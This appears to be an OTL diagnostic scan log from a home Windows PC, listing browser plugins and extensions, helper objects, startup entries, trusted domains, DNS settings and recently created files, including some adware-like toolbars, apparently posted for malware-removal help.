CHR - plugin: Java™ Platform SE 7 U25 (Enabled) = C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
CHR - plugin: Pando Web Plugin (Enabled) = C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll
CHR - plugin: RealPlayer™ G2 LiveConnect-Enabled Plug-In (32-bit) (Enabled) = C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll
CHR - plugin: RealPlayer Version Plugin (Enabled) = C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll
CHR - plugin: Windows Live\u0099 Photo Gallery (Enabled) = C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
CHR - plugin: Unity Player (Enabled) = C:\Users\Jon Lowry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
CHR - plugin: Facebook Video Calling Plugin (Enabled) = C:\Users\Jon Lowry\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll
CHR - plugin: Shockwave for Director (Enabled) = C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_168.dll
CHR - plugin: Java Deployment Toolkit 7.0.250.17 (Enabled) = C:\Windows\SysWOW64\npDeployJava1.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll
CHR - Extension: Google Drive = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: avast! Online Security = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki\9.0.2005.45_0\
CHR - Extension: Google Wallet = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\
CHR - Extension: Gmail = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\
CHR - Extension: Google Drive = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: avast! Online Security = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki\9.0.2005.45_0\
CHR - Extension: Google Wallet = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\
CHR - Extension: Gmail = C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

O1 HOSTS File: ([2013/12/06 14:52:24 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2:64bit: - BHO: (avast! Online Security) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O2:64bit: - BHO: (Download keepeR) - {69E81F82-21F6-0F27-3F07-7DA9AD036591} - C:\Program Files (x86)\Download keepeR\SwGMzO4Dk.x64.dll ()
O2:64bit: - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
O2 - BHO: (TBSB06948 Class) - {2C776F39-2849-4D43-AEF3-C2F8476BC90A} - C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll ()
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (DivX HiQ) - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
O3:64bit: - HKLM\..\Toolbar: (avast! Online Security) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (Multimedia Toolbar) - {968B9C5F-9D79-3863-CF0A-0E80D812E4C5} - C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll ()
O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [AdobeCS5ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [AVG_UI] C:\Program Files (x86)\AVG\AVG2013\avgui.exe (AVG Technologies CZ, s.r.o.)
O4 - HKLM..\Run: [CloneCDTray] C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe (SlySoft, Inc.)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [HP Quick Launch] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (Hewlett-Packard Development Company, L.P.)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe (Symantec Corporation)
O4 - HKLM..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe (Adobe Systems Incorporated)
O4 - HKU\S-1-5-21-538650268-2924358156-1730836174-1000..\Run: [DownBook] "C:\Users\Jon Lowry\AppData\Local\DownBook\DownBook.exe" 8f0d5b815fad402afc4e40d7cc42fc26 12 File not found
O4 - HKU\S-1-5-21-538650268-2924358156-1730836174-1000..\Run: [Facebook Update] C:\Users\Jon Lowry\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKLM..\RunOnce: [AvgUninstallURL] C:\Windows\SysWow64\cmd.exe (Microsoft Corporation)
O4 - Startup: C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O4 - Startup: C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk = File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8:64bit: - Extra context menu item: MasterCook: Select Image - C:\Program Files (x86)\MasterCook 9\Web\MCIEContext.hta ()
O8 - Extra context menu item: MasterCook: Select Image - C:\Program Files (x86)\MasterCook 9\Web\MCIEContext.hta ()
O9:64bit: - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9:64bit: - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000010 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000010 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O12 - Plugin for: .spop - C:\Program Files (x86)\Internet Explorer\Plugins\NPDocBox.dll (Intertrust Technologies, Inc.)
O13 - gopher Prefix: missing
O15 - HKU\.DEFAULT\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKU\.DEFAULT\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKU\.DEFAULT\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKU\.DEFAULT\..Trusted Domains: sony.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: freerealms.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: soe.com ([]* in Trusted sites)
O15 - HKU\S-1-5-18\..Trusted Domains: sony.com ([]* in Trusted sites)
O15 - HKU\S-1-5-19\..Trusted Domains: clonewarsadventures.com ([]* in )
O15 - HKU\S-1-5-19\..Trusted Domains: freerealms.com ([]* in )
O15 - HKU\S-1-5-19\..Trusted Domains: soe.com ([]* in )
O15 - HKU\S-1-5-19\..Trusted Domains: sony.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: clonewarsadventures.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: freerealms.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: soe.com ([]* in )
O15 - HKU\S-1-5-20\..Trusted Domains: sony.com ([]* in )
O15 - HKU\S-1-5-21-538650268-2924358156-1730836174-1000\..Trusted Domains: sony.com ([]* in Trusted sites)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2ECEE45-E66C-43D0-BF61-9B61E89D0E19}: DhcpNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E73B43AB-B625-4EF7-932A-B128EF0F8391}: DhcpNameServer = 192.168.15.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ms-help - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/02/07 00:44:47 | 000,000,000 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O34 - HKLM BootExecute: (먨t䎈፪剐䝏䅒㉾)
O34 - HKLM BootExecute: (|뻯㫮᪅䎈ᅓ*)
O34 - HKLM BootExecute: (㦏)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = ComFile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

NetSvcs:64bit: Remoteaccess - C:\Windows\SysNative\svchost.exe (Microsoft Corporation)

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

========== Files/Folders - Created Within 30 Days ==========

[2013/12/07 18:18:49 | 001,034,531 | ---- | C] (Thisisu) -- C:\Users\Jon Lowry\Desktop\JRT.exe
[2013/12/06 15:41:09 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Roaming\AVAST Software
[2013/12/06 15:39:44 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast
[2013/12/06 15:39:15 | 001,032,416 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSnx.sys
[2013/12/06 15:39:15 | 000,409,832 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswSP.sys
[2013/12/06 15:39:15 | 000,092,544 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2013/12/06 15:39:15 | 000,084,328 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2013/12/06 15:39:15 | 000,065,264 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswTdi.sys
[2013/12/06 15:39:15 | 000,038,984 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\drivers\aswFsBlk.sys
[2013/12/06 15:39:13 | 000,334,648 | ---- | C] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2013/12/06 15:39:03 | 000,043,152 | ---- | C] (AVAST Software) -- C:\Windows\avastSS.scr
[2013/12/06 15:38:05 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2013/12/06 15:36:30 | 000,000,000 | ---D | C] -- C:\ProgramData\AVAST Software
[2013/12/06 15:20:21 | 001,474,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll
[2013/12/06 15:20:10 | 001,930,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\authui.dll
[2013/12/06 15:20:08 | 001,796,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\authui.dll
[2013/12/06 15:20:07 | 000,197,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\credui.dll
[2013/12/06 15:20:07 | 000,190,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\SmartcardCredentialProvider.dll
[2013/12/06 15:20:07 | 000,152,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\SmartcardCredentialProvider.dll
[2013/12/06 15:19:59 | 001,447,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll
[2013/12/06 15:19:59 | 000,307,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ncrypt.dll
[2013/12/06 15:19:59 | 000,135,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspicli.dll
[2013/12/06 15:19:59 | 000,028,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspisrv.dll
[2013/12/06 15:19:59 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secur32.dll
[2013/12/06 15:19:55 | 000,404,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\gdi32.dll
[2013/12/06 15:19:47 | 000,830,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\nshwfp.dll
[2013/12/06 15:19:47 | 000,656,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\nshwfp.dll
[2013/12/06 15:19:47 | 000,324,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\FWPUCLNT.DLL
[2013/12/06 15:19:47 | 000,216,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\FWPUCLNT.DLL
[2013/12/06 15:13:33 | 000,526,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2013/12/06 15:13:33 | 000,391,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2013/12/06 15:13:32 | 000,136,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesysprep.dll
[2013/12/06 15:13:32 | 000,109,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesysprep.dll
[2013/12/06 15:13:32 | 000,089,600 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\RegisterIEPKEYs.exe
[2013/12/06 15:13:32 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\RegisterIEPKEYs.exe
[2013/12/06 15:13:32 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2013/12/06 15:13:32 | 000,061,440 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2013/12/06 15:13:32 | 000,051,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2013/12/06 15:13:32 | 000,039,936 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2013/12/06 15:13:32 | 000,033,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2013/12/06 15:13:29 | 000,855,552 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript.dll
[2013/12/06 15:13:29 | 000,690,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript.dll
[2013/12/06 15:13:29 | 000,603,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2013/12/06 15:13:28 | 003,959,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2013/12/06 15:11:48 | 000,000,000 | ---D | C] -- C:\Windows\temp
[2013/12/06 15:09:57 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Jon Lowry\Desktop\OTL.exe
[2013/12/06 14:52:35 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2013/12/06 00:09:53 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\cache
[2013/12/06 00:09:49 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\Mobogenie
[2013/12/06 00:09:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mobogenie
[2013/12/06 00:04:40 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SecretSauce
[2013/12/04 14:13:33 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Multimedia Toolbar
[2013/12/02 22:13:16 | 000,000,000 | R--D | C] -- C:\Users\Jon Lowry\Documents\Scanned Documents
[2013/12/02 22:13:16 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\Documents\Fax
[2013/11/29 23:24:07 | 000,000,000 | ---D | C] -- C:\Temp
[2013/11/29 22:57:17 | 000,078,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\perf-SQLAgent$SQLEXPRESS-sqlagtctr10.1.2531.0.dll
[2013/11/29 22:57:17 | 000,050,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\perf-SQLAgent$SQLEXPRESS-sqlagtctr10.1.2531.0.dll
[2013/11/29 22:57:06 | 000,111,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\perf-MSSQL$SQLEXPRESS-sqlctr10.1.2531.0.dll
[2013/11/29 22:57:06 | 000,079,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\perf-MSSQL$SQLEXPRESS-sqlctr10.1.2531.0.dll
[2013/11/29 22:56:08 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\RsFx
[2013/11/29 22:55:20 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Visual Studio 9.0
[2013/11/29 22:55:11 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Visual Studio 9.0
[2013/11/29 22:54:51 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\1033
[2013/11/29 22:54:51 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\1033
[2013/11/29 22:53:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008
[2013/11/29 22:48:55 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Synchronization Services
[2013/11/29 22:48:55 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft SQL Server Compact Edition
[2013/11/29 22:48:45 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Synchronization Services
[2013/11/29 22:46:35 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\Documents\Visual Studio 2010
[2013/11/29 22:46:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2010 Express
[2013/11/29 22:44:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Visual Studio 10.0
[2013/11/29 22:43:36 | 000,000,000 | ---D | C] -- C:\Windows\symbols
[2013/11/29 22:43:36 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Visual Studio 10.0
[2013/11/29 22:43:35 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft SDKs
[2013/11/29 22:43:35 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Help Viewer
[2013/11/27 00:33:37 | 000,000,000 | ---D | C] -- C:\Recovery
[2013/11/26 00:25:31 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinX DVD Author
[2013/11/26 00:25:25 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Digiarty
[2013/11/20 21:50:07 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Roaming\SketchUp
[2013/11/15 14:20:37 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\LogMeIn Rescue Applet
[2013/11/15 13:49:50 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\Design Era Samples
[2013/11/15 13:49:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stitch Era Universal
[2013/11/15 13:46:35 | 001,101,824 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTDlgImgEFX14nu.dll
[2013/11/15 13:46:35 | 001,085,440 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\Ltimg14nu.dll
[2013/11/15 13:46:35 | 000,983,040 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LtDlgRes14nu.dll
[2013/11/15 13:46:35 | 000,442,368 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\ltkrn14nu.dll
[2013/11/15 13:46:35 | 000,299,008 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\ltdlgkrn14nu.dll
[2013/11/15 13:46:35 | 000,241,664 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\ltefx14nu.dll
[2013/11/15 13:46:35 | 000,155,648 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\ltfil14nu.DLL
[2013/11/15 13:46:35 | 000,106,496 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\lttwn14nu.dll
[2013/11/15 13:46:34 | 001,703,936 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTCLR14nu.dll
[2013/11/15 13:46:34 | 001,241,088 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTDlgFile14nu.dll
[2013/11/15 13:46:34 | 000,733,184 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTDlgClr14nu.dll
[2013/11/15 13:46:34 | 000,548,864 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTDlgImg14nu.dll
[2013/11/15 13:46:34 | 000,532,480 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTDlgImgDoc14nu.dll
[2013/11/15 13:46:34 | 000,450,560 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LTDlgEfx14nu.dll
[2013/11/15 13:46:34 | 000,380,928 | ---- | C] (LEAD Technologies, Inc.) -- C:\Windows\SysWow64\LFCMP14nu.DLL
